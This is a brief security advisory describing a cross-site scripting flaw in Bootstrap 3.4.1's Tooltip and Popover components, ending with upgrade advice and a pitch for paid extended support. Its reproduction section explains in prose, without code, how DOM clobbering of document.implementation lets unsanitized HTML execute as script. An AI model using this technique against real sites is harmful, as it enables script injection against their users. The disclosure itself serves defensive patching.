Bootstrap Cross-Site Scripting Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in Bootstrap versions 3.4.1 prior to 4.0.0. This issue arises in the Popover and Tooltip components, where unsanitized HTML can be injected and executed.

Impact

Exploitation of this vulnerability allows for cross-site scripting, where an attacker can inject malicious scripts that are executed in the context of the user's browser.

Reproduction

To reproduce this vulnerability, create an HTML page using Bootstrap v3.4.1. Add an image tag that clobbers the 'document.implementation' by naming it 'implementation'. Then, add a button with 'data-toggle="tooltip"' or 'data-toggle="popover"', and include unsanitized HTML in the 'title' or 'data-content' attributes. When the button is activated, the injected script will execute, demonstrating the XSS vulnerability.

Remediation

Users can upgrade to Bootstrap 3.4.7 or migrate to a supported version of Bootstrap. For commercial support, HeroDevs offers a Never-Ending Support version for Bootstrap.